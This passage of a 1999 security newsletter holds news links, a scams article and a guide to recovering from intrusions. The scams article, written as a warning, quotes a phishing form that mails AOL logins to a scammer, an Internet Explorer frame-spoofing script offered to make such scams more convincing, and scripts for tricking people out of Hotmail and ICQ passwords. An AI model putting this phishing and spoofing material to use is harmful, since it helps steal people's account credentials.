  841. is possible. 
  842.  
  843. We are lucky to view and get info on LockDown 2000 Version 4.0 
  844. Pre-Release. This version fixes some minor bugs and adds some more 
  845. control to the user. Also another handy feature is upon exiting it 
  846. saves the configuration changes you made. Plus the trojan count has 
  847. been increased to 378. Unfortunately the price is still probably high 
  848. at 99 US dollars. We also have not had the chance to personally test 
  849. it, maybe by next week we can. 
  850.  
  851.  
  852. zemac
  853. zemac@dark-e.com
  854. http://www.dark-e.com
  855.  
  856.  
  857.  
  858. X. Freedom of speech - related incidents
  859. ------------------------------------------
  860.  
  861. *******************************************************************
  862. Independence is my happiness, and I view things as they are, without 
  863. regard to place or person; my country is the world, 
  864. and my religion is to do good. 
  865.  
  866. - Thomas Paine
  867. *******************************************************************
  868.  
  869. Every day the battle between freedom and repression rages through the global ether.  
  870. Here are this week's links highlights from NewsTrolls(http://www.newstrolls.com):
  871. ----------------------------------------------------------------------
  872.  
  873. Weekend August 20-22
  874.  
  875. US redoubling efforts to 
  876. <http://dailynews.yahoo.com/h/nm/19990820/ts/technology_covert_3.html>
  877. invade encrypted privacy
  878.  
  879. And the US DOJ wants easier 
  880. <http://www.washingtonpost.com/wp-srv/business/daily/aug99/encryption20.htm>
  881. covert action capabilities 
  882.  
  883.  
  884. -----------------------------------------------------------------
  885.  Monday August 23
  886.  
  887. Recently freed Lafitte says the World Bank is to blame 
  888. <http://www.insidechina.com/features.php3?id=87242.>
  889. for the detentions...
  890.  
  891. "Lafitte, a Tibetan expert, said he had grave fears about the safety 
  892. of his local translator, Tsering Dorje, and for Meston, who reportedly 
  893. suffered spinal and internal injuries when he jumped from a building 
  894. while trying to escape police. "The World Bank must bear direct 
  895. responsibility for what happened and must act with its unique leverage 
  896. as the biggest provider of capital to China to do something to help both 
  897. the American, who is in trouble but at least has the American government 
  898. to help him. "And particularly I feel it's the responsibility of the 
  899. World Bank to do something for our translator, who has no government he 
  900. can turn to...to protect him," he said." 
  901.  
  902. Under Chinese detention for investigating World Bank program, 
  903. <http://www.washingtonpost.com/wp-srv/inatl/feed/a30394-1999aug23.htm>
  904. Meston, an American, somehow fell out of a 3-story building and broke his back... 
  905.  
  906. "The men assigned to monitor Lafitte told him at least three times that he was 
  907. lucky he was Australian, and not American, because the United States had bombed 
  908. China's embassy in Belgrade. "America is always trying to hold us back, 
  909. trying to make us weak," he recalled one saying." 
  910.  
  911.  
  912. -------------------------------------------------------------------
  913. Tuesday August 24
  914.  
  915. The Federal Reserve Board's opposition to 
  916. <http://www.innercitypress.org/frreport.html>
  917. the Freedom of Information Act... 
  918.  
  919. Thousands of Mexican Indians and Zapatista supporters 
  920. <http://asia.yahoo.com/headlines/240899/world/935433360-90823183648.newsworld.html>
  921. march in protest against military presence in Chiapas 
  922.  
  923. African consumers speak out on 
  924. <http://www.africanews.org/atlarge/stories/19990823_feat5.html>
  925. product dumping and market liberalization at their expense...
  926.  
  927. "According to Consumers International, consumption per capita in Africa has 
  928. gone down by 20 percent over the past 20 years. Under the current exchange 
  929. system, Least Advanced Countries will lose up to 600 million US dollars per year. 
  930. This painful reality is contrary to the main objectives of the WTO charter, 
  931. which requires signatory parties to recognise that the objective of their 
  932. trading and economic relations must be to raise the living standards of the 
  933. populations through employment of higher incomes. This is why African consumer 
  934. organisations have been pressing decision makers and multinational companies 
  935. to stop regarding consumer rights as a hindrance to trade and investment." 
  936.  
  937. ----------------------------------------------------------------------
  938. Wednesday August 25
  939.  
  940. Iran paper calls for 
  941. <http://asia.yahoo.com/headlines/250899/world/935575740-90825100957.newsworld.html>
  942. pre-election live TV debates...
  943.  
  944. "The Iran News also said conservative-dominated state television has 
  945. "shied away from the clash of ideas" and that its programming has 
  946. "not been able to quench the public thirst for more accurate and 
  947. impartial information.""
  948.  
  949. He Zhaohui, 32, labor activist gets 10 years in prison for 
  950. <http://www.insidechina.com/news.php3?id=87778>
  951. "providing information to overseas organizations" 
  952.  
  953. "He, who organized over 10 workers' demonstrations in Chenzhou in 1997 and 1998, 
  954. reported workers' protests in the province to democracy movements and human 
  955. rights organizations in the United States, the center said." 
  956.  
  957. Over 10,000 pro-independence demonstrators 
  958. <http://asia.yahoo.com/headlines/250899/news/935568600-90825081041.newsasia.html>
  959. rally in Dili ahead of East Timor elections...
  960.  
  961. More on 
  962. <http://news.bbc.co.uk/hi/english/world/asia-pacific/newsid_429000/429563.stm>
  963. the rally... 
  964.  
  965. "One of the organisers, Agio Pereria, said a clear message was being 
  966. sent to anyone planning to sabotage the ballot and abort the consultation 
  967. process. "Don't stop our people to reach the ballot box, because this is 
  968. a right," he said. "Each individual has his or her right to exercise the 
  969. right to vote in peace. And we hope that this is the message that we 
  970. send today." 
  971. diva aka Pasty Drone
  972. NewsTrolls, Inc. , http://www.newstrolls.com
  973. pastydrone@newstrolls.com
  974.  
  975.  
  976.  
  977. XI. Scams - Getting something by all means 
  978. ------------------------------------------
  979.  
  980. This article will talk about common light Internet scams that could 
  981. happen to everyone who is not careful (but do note that they will often
  982. happen to the people who have not great knowledge in computers,
  983. especially in some basics of Internet surfing.
  984. I don't know but lot of wannabe "hackers" think that they must start
  985. with hotmail or yahoo hacking. They want to get someone's e-mail 
  986. password so they could read his e-mail, tease the "victim" and to
  987. get some passwords (like if the victim has registered a webpage with
  988. corrupted e-mail, attacker could easily snatch it). Even when I started
  989. working on net-security, I got lot of e-mail saying like: "Help me to
  990. hack a hotmail account". Better advise to this people is to start 
  991. learning something that could really be useful to them.
  992.  
  993. (1)
  994.   Hotmail "hacking" (this one is almost legendary, because this "way
  995.   of hacking" could be found on almost every Usenet group which has 
  996.   hack in its topic.
  997.  
  998. <********************************************************************>
  999.  
  1000. First, start with opening your own hotmail address. 
  1001. Select compose. 
  1002. Type in : 
  1003.  
  1004. To: emailoftheattacker@hotmail.com    
  1005.  
  1006. Subject: HTM.MSN.PW.REQ 
  1007. (It is absolutely necessary to type in CAPITALS - subject 
  1008. headers are case sensitive ) 
  1009.  
  1010. Message: 
  1011. [First line] The login name of the person you want to hack 
  1012.  
  1013. [2nd line] Your own password. 
  1014. Because the automatic hotmail responder will require your 
  1015. "systemadministrator password" which is in fact are your own password! 
  1016. But the computer doesn't know that
  1017.  
  1018. [third line] x3iZ0k45-MSN-6TqGW-reqf47890sys (case sensitive) 
  1019.  
  1020. How it works: 
  1021. You mail to a systemadministrators automatic responder. 
  1022. Usually only system administrators should be able to use this 
  1023. ( when for example getting lost passwords ), but when you try it 
  1024. with your own password and mail the above explained message from your 
  1025. hotmail account the computer gets confused! 
  1026. MSN will respond with an automated message indicating the password requested
  1027. NOTE that if the message you send MSN is composed incorrectly, 
  1028. or there has been a change in the status of the user queried,
  1029. you may not get an automated response 
  1030. In this event, you will need to resubmit the request.
  1031. This "trick" usually takes about 4 hours to get a reply of.
  1032.  
  1033. <********************************************************************>
  1034.  
  1035. I am sad to say, but according to the critics of victims on usenet, 
  1036. this fraudulent activity works on someone. This whole story with
  1037. sending your own password is bogus and it isn't also very imaginative.
  1038. I came across this page on Geocities, and it is just a little bit
  1039. modernized version of an old fraud, that we wrote about on net-security,
  1040. exactly 10 months ago (sending your password was then explained like 
  1041. this: "By doing this, the computer which receives the email believes you
  1042. are a Hotmail System administrator, and sends you the password you 
  1043. require within 1-2 hours"). 
  1044.  
  1045. (2)
  1046.   AOL web fraud
  1047.  
  1048. I came across on this trick, by reading attrition's mirrors of hacked
  1049. pages. Originally the site for this scam was on www.arodnet.com with
  1050. a backup on pages.hotbot.com server. Just to note that this page is as
  1051. I'm writing this defaced again. So when you access this page it gives you
  1052. exactly the same look as the AOL NetMail site (www.aol.com/netmail).
  1053. You have a form where you can enter Screen Name and appropriate password.
  1054. When you enter it, form doesn't do what you think it is supposed to do:
  1055. it sends an e-mail message to the creator of it with your login and
  1056. password. Code follows:
  1057.  
  1058. <********************************************************************>
  1059.  
  1060. <form action="http://bewoner.dma.be/bew-bin/ukmailer.cgi" method=POST>
  1061. <INPUT TYPE="HIDDEN" NAME="recipient" VALUE="sabbs@hotmail.com">
  1062. <input type=hidden name="subject" value="You've Got Mail">
  1063. <input type=hidden name="redirect" value="http://pages.hotbot.com/biz/
  1064. deity/error.html">
  1065.  
  1066. <********************************************************************>
  1067.  
  1068. So it sends your information and you get a html note that you entered
  1069. the wrong password and it redirects you to the REAL Net Mail log-on 
  1070. site. On this way, if you were not too cautious, you shared your info, 
  1071. and you don't have a clue that you did it.
  1072. Just to add -  Scammers obtaining a screen name or password could 
  1073. potentially do considerable harm on an AOL member's account. An 
  1074. account violator could use the member's communications features, such 
  1075. as email and the instant messenger buddy list, or even purchase goods 
  1076. with the member's credit card.
  1077.  
  1078. I was thinking about how this fraud trick could be even more realistic.
  1079. Well when you enter the password, new html file opens that says that 
  1080. you must try again, and the Address bar in this issue says:
  1081. http://pages.hotbot.com/biz/deity/error.html
  1082. If you add some Java script and if you know for frame spoofing 
  1083. vulnerability, you could improve the scam to maximum.
  1084. Frame spoofing vulnerability is found by Georgi Guninski and it "works"
  1085. on Internet Explorer 4.x browsers (the bug was patched afterwards).
  1086. This example opens a fake www.yahoo.com website.
  1087.  
  1088. <********************************************************************>
  1089.  
  1090. <SCRIPT>
  1091. b=showModalDialog("about:<SCRIPT>a=window.open('http://www.yahoo.com');
  1092. a.document.write('<HTML><HEAD><TITLE>Yahoo</TITLE><BODY></HEAD><H1>Look
  1093. at the address bar!<BR>');a.document.write('<A HREF=\"http://www.whiteh
  1094. ats.com/guninski\">Go to Georgi Guninski\\'s home page</A></H1></BODY>
  1095. </HTML>');close()</"+"SCRIPT>%01http://www.yahoo.com");
  1096. </SCRIPT>
  1097.  
  1098. <********************************************************************>
  1099.  
  1100. All this information about successfully using Frame spoofing vulnerability
  1101. with this scam is presented in educational purpose, for you, to see
  1102. that you must be real careful, because with some little tricks you 
  1103. could be deceived easily.
  1104.  
  1105.  
  1106. (3)
  1107.   ICQ password stealing
  1108.  
  1109. If you are non-suspicious, you could easily lose your ICQ password.
  1110. This is the "ICQ exploit" that could be found on some "underground 
  1111. sites on the Internet. It isn't really an exploit, but just a way
  1112. to get someone's ICQ password easily. 
  1113.  
  1114. <********************************************************************>
  1115.  
  1116. Ok..the trick to this is to trick someone into putting
  1117. your email address as their email address..and then you
  1118. goto www.icq.com/password and type in their UIN..it sends
  1119. their password to the email in their info..now here are a
  1120. few tricks to get them to put your email or any email you know
  1121. the password to in their ICQ info..
  1122.  
  1123. 1)you have a klan? Ask them to join..if they do..tell them
  1124. you have a klan email..(yourklan@hotmail.com)or whatever
  1125. tell them to put that as their email so people can contact
  1126.  
  1127. <********************************************************************>
  1128.  
  1129. So don't change your e-mail settings for ICQ, because it couldn't be
  1130. good for you (try to think, why would someone tell you that you write
  1131. his e-mail address in your ICQ settings, what could he absolutely get
  1132. than using it against you. Well most of this scams work on a social 
  1133. engineering base - they try to make you believe them.
  1134.  
  1135.  
  1136. (4)
  1137.   Combinations
  1138.  
  1139. Following two stories were picked up by news sites.
  1140.  
  1141. CNET (www.cnet.com) 04.03.1998 > "Hotmail suffers email scam" 
  1142.  
  1143. A Hotmail user who registered the name "admin@hotmail.com" sent out 
  1144. official-sounding email to an indeterminate number of people earlier 
  1145. this week telling users that "The trial period for your free Hotmail 
  1146. Service is rapidly coming to a close." 
  1147. It goes on to tout Hotmail's features and tells users the accounts will
  1148. cost $10 per year. It then requests that the user send an email to 
  1149. "admin@hotmail.com" for an account form. 
  1150. "Payments will be accepted by certified cheque, money order, or credit 
  1151. cards only," it states. 
  1152. Hotmail pulled the account yesterday as soon as the staff found out 
  1153. about it, said Randy Delucchi, Hotmail's director of customer service. 
  1154. Delucchi said he wasn't sure how many people got the email message, 
  1155. but added he was sure it "wasn't very widespread at all," because 
  1156. Hotmail has implemented antispam measures that prevent email from being
  1157. sent to more than 25 people at a time. 
  1158. Spammers generally like to send email to thousands of people at once. 
  1159. This is not the first time people have used free email to try to scam 
  1160. their fellow Netizens. 
  1161. In December, someone used Yahoo's free email to send out an 
  1162. official-looking letter telling users they had won a modem from Yahoo 
  1163. and would have to supply their names, addresses, and telephone numbers 
  1164. as well as a credit card number to pay for shipping. 
  1165.  
  1166. CNET (www.cnet.com) 22.04.1999 > "AOL warns of email scam" 
  1167.  
  1168. America Online is warning users that email messages posing as 
  1169. AOL-endorsed offers and notices are really trying to gather sensitive 
  1170. member information.
  1171. A number of these messages have such subject headings as "AOL Server 
  1172. Error," "AOL Billing Problem," "Beanie Babies," or "AOL Rewards," and 
  1173. are intended to lure members to open them, according to a cautionary 
  1174. posting on the "Neighborhood Watch" page within AOL's proprietary 
  1175. service.
  1176. The warning says the messages contain HTML hyperlinks that lead to 
  1177. Web sites pretending to be a standard registration Web page. But these 
  1178. pages ask for member screen names or passwords, which could potentially 
  1179. lead scammers into AOL member accounts.
  1180. One sample email reads: "A database error has deleted the information 
  1181. for over 25,000 accounts, and yours is one. In order for us to access 
  1182. the back-up data of your account, we do need your password. Without 
  1183. your password, we will NOT be able to allow you to sign onto America 
  1184. Online within the next 24 hours after your opening of this letter."
  1185. According to AOL spokesman Rich D'Amato, AOL posted its warnings three 
  1186. weeks ago, prompted by "member complaints, as well as emails that we 
  1187. had been seeing."
  1188.  
  1189. So you got the point, be very carefull. Scams are different: from the
  1190. realy pathetic ones (that Hotmail hacking) to more complecsive (using
  1191. frame spoofing). Also note that hack/hacking words are under " ", 
  1192. because scams are in no way means or ways of hacking.
  1193.  
  1194. Berislav Kucan
  1195. aka BHZ
  1196. bhz@net-security.org
  1197. http://net-security.org
  1198.  
  1199.  
  1200.  
  1201. XII. Intrusion and detection part two
  1202. ---------------------------------------
  1203.  
  1204. This is a follow-up to last week's article on responding to an intrusion,
  1205. which can be found at http://default.net-security.org/dl/default2.txt.
  1206. Today I'll go into a more in-depth look at recovering from an intrusion,
  1207. and a brief look at computer forensics -- i.e., what to do if you want to
  1208. try to get the law involved in the incident.
  1209.  
  1210. Much like any other part of intrusion response, recovery from attack
  1211. starts before you've been attacked. It can be very difficult to recover
  1212. if you don't have recent backups of your system -- back things up
  1213. regularly; nightly if possible. If you've got important information on
  1214. your system, a nightly backup just makes sense. I prefer backing up to
  1215. tape if you can afford a tape drive, but it's not a requirement. What you
  1216. do need is some form of backup that holds your important system files and
  1217. binaries, so you can restore if something happens, or a rescue disk that
  1218. contains clean versions of important system binaries. Also (preferably at
  1219. the time when you actually install your operating system, so you're sure
  1220. it's clean), run a program that checks your system. Tripwire, for
  1221. instance, is a wonderful tool that works on Solaris, Linux, and Windows
  1222. NT. It takes a sort of snapshot of your system and creates a database
  1223. which contains the checksum, creation date, and access permissions for
  1224. each file. If you feel that your system may have been compromised, you
  1225. can run tripwire against it again, and compare the results to see if
  1226. anything's changed (tripwire can even be run regularly, to detect
  1227. changes; perhaps run it just before your regular backup, to see if
  1228. anything's been altered since your last backup). Tripwire aids in
  1229. recovery because it can point out exactly which files were damaged or
  1230. altered, as in the case of trojaned binaries and rootkits, and can allow
  1231. quick replacement of them with good copies. And of course, the third
  1232. thing to do before an intrusion begins is to be aware of intrusion
  1233. detection tools. Run them, watch the logs, and be alert -- you can't
  1234. recover from an attack you don't know happened.
  1235.  
  1236. As I discussed last week, one of the most important things you can do is 
  1237. log, and maintain the integrity of your logs. The need for good logs
  1238. really comes into play here, in several different ways. For the purposes
  1239. of this article, I'm assuming that you have intrusion detection tools
  1240. running, tripwire installed, and are watching and recording your logs. I
  1241. should note that it's best to log to a remote, secure loghost, log to a
  1242. printer, or at least make sure that if your logs are on the same host, 
  1243. your log files are append-only (only new text can be added) -- most
  1244. rootkits now go through and edit logs to remove an attacker's traces. If
  1245. you're logging to a different machine or a cheap dot matrix printer in the
  1246. corner, they'll have a hard time covering their tracks -- I'm going to
  1247. assume, for this article, that your logs are intact.
  1248.  
  1249. When your intrusion detection software starts sending out alerts, the most
  1250. important rule is -not- to panic. You cannot react faster than data can
  1251. come in to your computer -- by the time you've noticed the attack, the
  1252. attacker is already several steps ahead of you, and may already be in your
  1253. system before you can react.
  1254.  
  1255. Isolate the machine. There is one school of thought that advocates
  1256. pulling the power cord out of the computer (don't shut down first; many
  1257. rootkits install cleanup routines in the system's shutdown proceedures,
  1258. and you'll lose anything they'd added). I don't advocate this as a first
  1259. step -- I suggest pulling the network cable (modem, ethernet, whatever you
  1260. have connecting your machine to the internet). Pulling the power can lose
  1261. you a lot of information that would be helpful in diagnostics -- a lot of
  1262. scripts put files in /tmp, for instance, and on some operating systems 
  1263. that would be lost on a power-down. Once you've gotten the information
  1264. you need, run tripwire to get a new database of exactly what the system
  1265. looks like now...-then- pull the power cord (again, don't shutdown
  1266. normally). The reason for this becomes important later.
  1267.  
  1268. It's at this point that you need to decide whether or not to pursue legal
  1269. action. In most cases, especially for home users, the hassle of law
  1270. enforcement involvement is not worth it, and all you'll want to do is
  1271. rebuild and secure your machine. At the end of this article is a brief
  1272. discussion of what to do if you -do- want to involve law enforcement.
  1273.  
  1274. You've been attacked -- now it's time to rebuild. You have two options --
  1275. the easy way and the paranoid way. The paranoid way is pretty
  1276. self-explanatory: wipe -everything- and restore from a known clean backup
  1277. or reinstall from read-only media. For the easy way, turn your system
  1278. back on, but -don't- plug it into the network. Get your clean backup
  1279. disk (run tripwire on your backup to make certain it's clean), find the
  1280. files that were altered (compare the backup's tripwire database with the
  1281. current files on your system), and replace them with the safe binaries
  1282. you'd had on your backup. Commonly replaced binaries include /bin/login,
  1283. /bin/ps, /bin/ls, /bin/df, /usr/etc/in.telnetd, /usr/etc/in.ftpd,
  1284. /usr/etc/in.tftpd, /usr/sbin/ifconfig, etc (note that these locations may 
  1285. be different for different flavors of UNIX). Check -everything- -- files
  1286. can be changed in unexpected ways, or be added in unusual places. Some
  1287. attackers like to hide their files, for instance, in /tmp, /etc/tmp,
  1288. /var/temp, /usr/spool, etc. Look for files with spaces in the name. Look
  1289. for alterations of /etc/hosts.equiv, /bin/.rhosts (or any .rhosts file at 
  1290. all), /etc/passwd, /etc/group, etc. 'Find' is a good command for this; it
  1291. can be used to find all suid/sgid files, sneaky .rhosts, etc. Look for
  1292. suid root binaries in unexpected places. Next, look to make sure there
  1293. isn't a sniffer installed. On UNIX-based machines, if a sniffer's
  1294. installed on an interface, the interface will have the PROMISC flag set
  1295. (short for 'promiscuous' -- it means the interface is listening to all the
  1296. traffic on the network, not just the packets intended for that interface).
  1297. Sounds easy? Not so. There are scripts that install a sniffer -and- hide
  1298. the PROMISC flag. The way to check is to set the interface PROMISC
  1299. yourself, and then check to see if the PROMISC flag shows up. If it
  1300. doesn't show up, you may have a problem -- make sure you replace ifconfig
  1301. with a known good copy, and again, look for strange suid binaries and
  1302. files owned by root that shouldn't be.
  1303.  
  1304. Personally, I recommend wiping everything and starting from a good backup.
  1305. It's safer, and you don't need to worry about having missed something
  1306. important. Reinstalling from known good media may be paranoid, but it
  1307. obviates a lot of the work of finding all files that have been tampered
  1308. with, and will remove things like sniffers and back doors. If you'd like
  1309. to do an in-depth analysis, make a complete sector-by-sector copy of the
  1310. compromised disk before you wipe it, then mount (don't boot, mount) the
  1311. copy read-only on a known good system, and do your analysis there.
  1312.  
  1313. Now start going through the logs. What happened? Do you see anything
  1314. unusual? Look as far back through your logs as you can; maybe you'll see
  1315. the initial intrusion. Using another computer (or using the hacked
  1316. system, if you feel lucky, punk), use search engines to look up anything
  1317. in your logs you don't understand; you may be surprised at what you find.
  1318. The goal is to find out exactly how the attacker got in, find the hole,
  1319. and repair it. Most commonly-exploited holes have patches -- do some
  1320. research on your favorite search engine, find the exploit, find the patch,
  1321. and fix the hole. If you can't find anything that might have been used
  1322. against you (and be sure to look in the Bugtraq archives at
  1323. http://www.securityfocus.com/ -- click on 'forums' and then 'bugtraq',
  1324. then 'archive'), you may want to email cert@cert.org to notify the CERT
  1325. team. They may not respond, but if it really is a new exploit, they'll
  1326. look into it -- see http://www.cert.org/tech_tips/incident_reporting.html
  1327. for more information. Once you've got your system patched and replaced
  1328. all the altered files, change all passwords on the system, just in case
  1329. the attacker has your /etc/passwd (or /etc/shadow) file.
  1330.  
  1331. But suppose you -do- want to take the matter to law enforcement. The most
  1332. important thing you can do, if that's the case, is to preserve
  1333. evidence...and your hard drive is evidence. When you pulled the power on
  1334. your hacked machine, you preserved as much of the current state of your
  1335. system as you could. Now you need to physically remove the hard drive
  1336. from the computer, set it to read-only (if you want to do analysis on it, 
  1337. make a complete physical sector-by-sector copy, and mount it -- don't boot
  1338. it -- read-only on a known 'good' system, and do your analysis on -that-),
  1339. and place it in a safe along with a copy of the original tripwire database
  1340. and a copy of the tripwire database you'd taken just before pulling the
  1341. plug. Also put into the safe all of the relevant logs, also in read-only
  1342. format to prove they have not been edited -- one idea is to print out
  1343. your logs, sign and date them, and have them notarized to prove the
  1344. electronic copies have not been tampered with. Include as well as much
  1345. information as you had been able to gather about the attacker (see the
  1346. previous article at http://default.net-security.org/dl/default2.txt for a
  1347. simple discussion of how to identify the attacker). The more information
  1348. you can provide law enforcement, the more likely they are to be able to
  1349. prosecute. Document everything you possibly can -- a clear chain of
  1350. evidence must be compiled before you can hope to have anything done, and
  1351. you must be able to show that that evidence has not been tampered with.
  1352. Once you have all your evidence, contact law enforcement -- I should note
  1353. that, just as it's a good idea to know who your ISP's security team is
  1354. ahead of time, it's handy to know ahead of time who to contact among local
  1355. law.
  1356.  
  1357. And be nice to them. You -want- them to like you.
  1358.  
  1359. Comments to this article are welcome -- not everyone responds to incidents
  1360. in the same way, and I'd be very interested in hearing other methods, or
  1361. hearing opinions I may not have considered yet.
  1362.  
  1363. /dev/null
  1364. null@fiend.enoch.org
  1365.  
  1366. (thanks to mike@enoch.org for his help with this article)
  1367.  
  1368.  
  1369.  
  1370.  
  1371.  
  1372.  
  1373.  
  1374. --------------------------------------------------------------------------------
  1375.                 Default newsletter Issue #3
  1376.                 http://default.net-security.org
  1377.                 27.08.1999 Help Net Secutity
  1378.                 http://www.net-security.org
  1379. --------------------------------------------------------------------------------